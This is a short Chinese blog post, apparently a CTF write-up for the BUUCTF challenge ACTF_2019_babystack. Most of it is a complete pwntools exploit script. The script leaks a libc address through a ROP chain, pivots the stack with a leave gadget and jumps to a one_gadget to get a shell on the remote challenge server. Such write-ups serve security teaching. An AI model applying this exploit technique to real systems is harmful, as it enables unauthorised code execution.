Loading... <!-- wp:paragraph --> <p> 一道简单的通过leave栈迁移实现更长的rop链的题</p> <!-- /wp:paragraph --> <!-- wp:code --> <pre class="wp-block-code"><code>#!/usr/bin/env python # coding=utf-8 from pwn import * from LibcSearcher import * pop_rdi_ret = 0x400ad3 context(log_level = 'debug') sh = remote("node3.buuoj.cn","28568") #sh = process("./ACTF_2019_babystack") elf = ELF("./ACTF_2019_babystack") libc = ELF("./buu-libc-2.23.so") sh.sendlineafter("e?\n>",str(0xE0)) sh.recvuntil("at ") stackaddr = int(sh.recvuntil("\n",drop = True),base = 16) payload = 'fillfill' + p64(pop_rdi_ret) + p64(elf.got["puts"]) payload += p64(elf.symbols["puts"]) + p64(0x400800) payload = payload.ljust(0xD0,'a') payload += p64(stackaddr) + p64(0x400A18) sh.sendafter('>',payload) sh.recvuntil("e~\n") puts_addr = u64(sh.recvuntil('\n',drop = True).ljust(8,'\x00')) LIBC = LibcSearcher('puts',puts_addr) base = puts_addr - LIBC.dump('puts') print base sh.sendlineafter("e?\n>",str(0xE0)) sh.recvuntil("at ") stackaddr = int(sh.recvuntil("\n",drop = True),base = 16) payload = 'a' payload = payload.ljust(0xD8,'a') payload += p64(base + 0x10a38c) sh.sendafter('>',payload) sh.interactive() </code></pre> <!-- /wp:code --> <!-- wp:paragraph --> <p>和<a href="https://www.cjovi.icu/?p=789">此题</a>类似</p> <!-- /wp:paragraph --> 最后修改:2020 年 12 月 30 日 11 : 46 PM © 允许规范转载 赞赏 如果觉得我的文章对你有用,那听听上面我喜欢的歌吧 ×Close 赞赏作者 扫一扫支付 支付宝支付 微信支付
